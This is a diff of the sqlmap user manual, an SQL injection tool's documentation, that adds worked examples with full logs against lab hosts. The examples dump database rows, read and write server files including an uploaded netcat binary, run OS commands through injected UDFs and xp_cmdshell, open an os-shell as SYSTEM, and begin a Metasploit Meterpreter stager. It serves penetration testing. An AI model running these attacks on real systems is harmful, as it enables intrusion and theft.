+3667,8 @@ MID((%s), %d, %d) ORDER BY %s ASC SELECT %s FROM %s.%s SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) -SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' +SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND +table_schema='%s' SELECT grantee FROM information_schema.USER_PRIVILEGES SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES SELECT schema_name FROM information_schema.SCHEMATA @@ -3731,10 +3723,12 @@ table_schema=CHAR(116,101,115,116) LIMIT 2, 1 [hh:mm:48] [INFO] performed 55 queries in 0 seconds [hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users [hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y -[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users +[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM +test.users [hh:mm:04] [INFO] retrieved: 5 [hh:mm:04] [INFO] performed 13 queries in 0 seconds -[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many entries +[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many +entries do you want to retrieve? [a] All (default) [#] Specific number @@ -3749,8 +3743,8 @@ ORDER BY id ASC LIMIT 0, 1 ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: luther [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 0, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: blissett [hh:mm:09] [INFO] performed 62 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3761,8 +3755,8 @@ ORDER BY id ASC LIMIT 1, 1 ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: fluffy [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 1, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: bunny [hh:mm:09] [INFO] performed 41 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3773,8 +3767,8 @@ ORDER BY id ASC LIMIT 2, 1 ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: wu [hh:mm:09] [INFO] performed 20 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 2, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: ming [hh:mm:10] [INFO] performed 34 queries in 0 seconds SELECT * FROM test.users [3]: @@ -3799,7 +3793,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql [...] back-end DBMS: PostgreSQL -[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER +[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER sql> SELECT COUNT(name) FROM users [10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' [10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n @@ -3812,8 +3806,8 @@ SELECT COUNT(name) FROM users: '4' sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell'); [10:12:35] [INFO] testing stacked queries support on parameter 'id' [10:12:40] [INFO] the web application supports stacked queries on parameter 'id' -[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) -VALUES (5, 'from', 'sql shell');' +[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users +(id, name, surname) VALUES (5, 'from', 'sql shell');' [10:12:40] [INFO] done sql> SELECT COUNT(name) FROM users [10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' @@ -3847,21 +3841,23 @@ Option: --read-file

It is possible to retrieve the content of files from the underlying file -system when the back-end database management is system is either MySQL, -PostgreSQL or Microsoft SQL Server. +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-The techniques implemented are detailed on the white paper +These techniques are detailed on the white paper .

-Example on a PostgreSQL 8.3.5 target: +Example on a PostgreSQL 8.3.5 target to retrieve a text file: -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \ - "C:\example.txt" -v2 +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \ + --read-file "C:\example.txt" -v 2 [...] [hh:mm:53] [INFO] the back-end DBMS is PostgreSQL @@ -3917,6 +3913,49 @@ $ cat output/192.168.1.121/files/C__example.txt This is a text file +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target to +retrieve a binary file: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --read-file "C:\example.exe" --union-use -v 1 + +[...] +[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing +technique +[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name' +[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql +injection vulnerability +[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter +'name' by appending a false condition after the parameter value +[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) +inband sql injection vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION +ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ' + +[hh:mm:49] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:54] [INFO] fetching file: 'C:/example.exe' +[hh:mm:54] [INFO] the SQL query provided returns 3 entries +C:/example.exe file saved to: '/home/inquis/sqlmap/output/192.168.1.121/files/ +C__example.exe' + +[hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/ +192.168.1.121' + +$ ls -l output/192.168.1.121/files/C__example.exe +-rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.1.121/files/C__example.exe + +$ file output/192.168.1.121/files/C__example.exe +output/192.168.1.121/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit + + Write a local file on the back-end DBMS file system @@ -3925,69 +3964,385 @@ Options: --write-file and --dest-file

It is possible to upload a local file to the underlying file system when -the back-end database management is system is either MySQL, PostgreSQL or -Microsoft SQL Server. +the back-end database management system is either MySQL, PostgreSQL or +Microsoft SQL Server and the session user has the needed privileges to +abuse database specific functionalities and architectural weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-The techniques implemented are detailed on the white paper +These techniques are detailed on the white paper .

-Example on a MySQL 5.0.67 target: +Example on a MySQL 5.0.67 target to upload a binary UPX-compressed +file: -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \ - "/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1 +$ file /tmp/nc.exe.packed +/tmp/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit + +$ ls -l /tmp/nc.exe.packed +-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" --write-file \ + "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1 [...] -[01:12:29] [INFO] the back-end DBMS is MySQL +[hh:mm:29] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL >= 5.0.0 -[01:12:29] [INFO] testing stacked queries support on parameter 'id' -[01:12:29] [INFO] detecting back-end DBMS version from its banner -[01:12:29] [INFO] retrieved: 5.0.67 -[01:12:36] [INFO] the web application supports stacked queries on parameter 'id' -[01:12:36] [INFO] fingerprinting the back-end DBMS operating system -[01:12:36] [INFO] retrieved: C -[01:12:36] [INFO] the back-end DBMS operating system is Windows +[hh:mm:29] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:29] [INFO] detecting back-end DBMS version from its banner +[hh:mm:29] [INFO] retrieved: 5.0.67 +[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:36] [INFO] retrieved: C +[hh:mm:36] [INFO] the back-end DBMS operating system is Windows do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y -[01:12:52] [INFO] retrieved: 31744 -[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same -size as the local file '/home/inquis/software/netcat/nc.exe.packed' +[hh:mm:52] [INFO] retrieved: 31744 +[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, +same size as the local file '/tmp/nc.exe.packed' Operating system access -Execute an operating system command +Execute arbitrary operating system command

-Option: --os-cmd +Options: --os-cmd and --os-shell

-TODO +It is possible to execute arbitrary commands on the underlying operating +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses.

-The techniques implemented are detailed on the white paper +On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality +demonstrated above) a shared library (binary file) containing two +user-defined functions, sys_exec() and sys_eval(), then +it creates these two functions on the database and call one of them to +execute the specified command, depending on the user's choice to display +the standard output or not. +On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored +procedure: if it's disable sqlmap re-enables it, if it does not exist, +sqlmap creates it from scratch. + +

+If the user wants to retrieve the command standard output, sqlmap will use +one of the enumeration SQL injection techniques (blind or inband) to +retrieve it, viceversa sqlmap will use the stacked query SQL injection +technique to execute the command without returning anything to the user. + +

+These techniques are detailed on the white paper . - -Prompt for an interactive operating system shell +

+It is possible to specify a single command to be executed with the +--os-cmd option.

-Option: --os-shell +Example on a PostgreSQL 8.3.5 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \ + --os-cmd "whoami" -v 1 + +[...] +[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: PostgreSQL + +[hh:mm:05] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:05] [INFO] detecting back-end DBMS version from its banner +[hh:mm:05] [INFO] retrieved: 8.3.5, +[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:16] [INFO] the back-end DBMS operating system is Windows +[hh:mm:16] [INFO] testing if current user is DBA +[hh:mm:16] [INFO] retrieved: 1 +[hh:mm:16] [INFO] checking if sys_exec UDF already exist +[hh:mm:16] [INFO] retrieved: 0 +[hh:mm:18] [INFO] checking if sys_eval UDF already exist +[hh:mm:18] [INFO] retrieved: 0 +[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file +[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file +do you want to retrieve the command standard output? [Y/n] +[hh:mm:35] [INFO] retrieved: w2k3dev\postgres +command standard output: 'w2k3dev\postgres' +

-TODO +Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-cmd "whoami" --union-use -v 1 + +[...] +[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing +technique +[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name' +[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql +injection vulnerability +[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' +by appending a false condition after the parameter value +[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband +sql injection vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION +ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv' + +[hh:mm:58] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:03] [INFO] testing if current user is DBA +[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:09] [INFO] xp_cmdshell extended procedure is available +do you want to retrieve the command standard output? [Y/n] +[hh:mm:11] [INFO] the SQL query provided returns 1 entries +command standard output: +--- +nt authority\network service +--- +

-The techniques implemented are detailed on the white paper -. +It is also possible to simulate a real shell where you can type as many +arbitrary commands as you wish. The option is --os-shell and has +the same TAB completion and history functionalities implemented for +--sql-shell. + +

+Example on a MySQL 5.0.67 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-shell -v 2 + +[...] +[hh:mm:36] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:36] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:36] [INFO] detecting back-end DBMS version from its banner +[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32)) +[hh:mm:36] [INFO] retrieved: 5.0.67 +[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds +[hh:mm:37] [DEBUG] query: SELECT SLEEP(5) +[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text) +[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) +[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32)) +[hh:mm:42] [INFO] retrieved: C +[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:42] [INFO] the back-end DBMS operating system is Windows +[hh:mm:42] [DEBUG] cleaning up the database management system +[hh:mm:42] [DEBUG] removing support tables +[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:42] [INFO] testing if current user is DBA +[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user= +(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END) +[hh:mm:42] [INFO] retrieved: 1 +[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds +[hh:mm:43] [INFO] checking if sys_exec UDF already exist +[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name= +CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) +THEN 1 ELSE 0 END) +[hh:mm:43] [INFO] retrieved: 0 +[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:43] [INFO] checking if sys_eval UDF already exist +[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name= +CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) +THEN 1 ELSE 0 END) +[hh:mm:43] [INFO] retrieved: 0 +[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique +[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to +[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob) +[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value +[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the +support table +[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table +[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...]) +[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...]) +[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...]) +[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] cleaning up the database management system +[hh:mm:44] [DEBUG] removing support tables +[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file +[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec +[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll' +[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file +[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval +[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME +'libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] creating a support table to write commands standard output to +[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput +[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext) +[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for +operating system command execution +[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER +os-shell> whoami +do you want to retrieve the command standard output? [Y/n] +[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami')) +[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM +sqlmapoutput +[hh:mm:41] [INFO] retrieved: nt authority\system +[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds +[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput +command standard output: 'nt authority\system' + +os-shell> [TAB TAB] +copy del dir echo md mem move +net netstat -na ver whoami xcopy + +os-shell> exit +[hh:mm:51] [INFO] cleaning up the database management system +[hh:mm:51] [DEBUG] removing support tables +[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] n +do you want to remove sys_eval UDF? [Y/n] n +[hh:mm:04] [INFO] database management system cleanup finished +[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system +can only be deleted manually + + +

+Now run it again, but specifying the --union-use to retrieve the +command standard output quicker, via UNION based SQL injection, when the +parameter is affected also by inband SQL injection vulnerability: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-shell -v 2 --union-use + +[...] +[hh:mm:16] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing +technique +[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id' +[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection +vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT +NULL, NULL, NULL# AND 528=528' + +[hh:mm:16] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:16] [INFO] detecting back-end DBMS version from its banner +[hh:mm:16] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77), +MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173 +[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:16] [DEBUG] query: SELECT SLEEP(5) +[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text) +[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77), +MID(@@datadir, 1, 1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:21] [INFO] the back-end DBMS operating system is Windows +[hh:mm:21] [DEBUG] cleaning up the database management system +[hh:mm:21] [DEBUG] removing support tables +[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:21] [INFO] testing if current user is DBA +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE +WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), +1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:21] [INFO] checking if sys_exec UDF already exist +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN +((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)= +CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# +AND 4900=4900 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +sys_exec UDF already exists, do you want to overwrite it? [y/N] n +[hh:mm:24] [INFO] checking if sys_eval UDF already exist +[hh:mm:24] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN +((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)= +CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# +AND 4437=4437 +[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds +sys_eval UDF already exists, do you want to overwrite it? [y/N] n +[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested +[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested +[hh:mm:25] [DEBUG] creating a support table to write commands standard output to +[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput +[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext) +[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for +operating system command execution +[hh:mm:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER +os-shell> ipconfig +do you want to retrieve the command standard output? [Y/n] +[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig')) +[hh:mm:29] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST +(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND +7106=7106 +[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput +command standard output: +--- + +Windows IP Configuration + + +Ethernet adapter Local Area Connection 2: + + Connection-specific DNS Suffix . : localdomain + IP Address. . . . . . . . . . . . : 192.168.1.121 + Subnet Mask . . . . . . . . . . . : 255.255.255.0 +---Default Gateway . . . . . . . . . : 192.168.1.1 + +os-shell> exit +[hh:mm:41] [INFO] cleaning up the database management system +[hh:mm:41] [DEBUG] removing support tables +[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] n +do you want to remove sys_eval UDF? [Y/n] n +[hh:mm:54] [INFO] database management system cleanup finished +[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system +can only be deleted manually + + +

+As you can see from this second example, sqlmap firstly check if the two +user-defined functions are already created, if so, it asks the user if he +wants to recreate them or keep them and save time. Prompt for an out-of-band shell, meterpreter or VNC @@ -3996,12 +4351,251 @@ The techniques implemented are detailed on the white paper Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

-TODO +It is possible to establish an out-of-band TCP stateful channel +between the attacker and the underlying operating system by using the +exploited SQL injection as a stepping stone. This is implemented for MySQL, +PostgreSQL and Microsoft SQL Server. +sqlmap relies on the to perform this attack, so you need to have it already +on your system: it's free and can be downloaded from the homepage. It is +advised to use Metasploit 3.3 development version from the subversion +repository.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+These techniques are detailed on the white paper . +

+Example on a MySQL 5.0.67 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-pwn -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:17] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:17] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:17] [INFO] detecting back-end DBMS version from its banner +[hh:mm:17] [INFO] retrieved: 5.0.67 +[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:23] [INFO] retrieved: C +[hh:mm:23] [INFO] the back-end DBMS operating system is Windows +[hh:mm:23] [INFO] testing if current user is DBA +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:23] [INFO] checking if sys_exec UDF already exist +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N +[hh:mm:24] [INFO] checking if sys_eval UDF already exist +[hh:mm:24] [INFO] retrieved: 1 +[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N +[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager +[hh:mm:24] [INFO] which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 1 +[hh:mm:24] [INFO] which is the back-end DBMS address? [192.168.1.121] 192.168.1.121 +[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588 +[hh:mm:24] [INFO] which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> 1 +[hh:mm:24] [INFO] which payload encoding do you want to use? +[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase 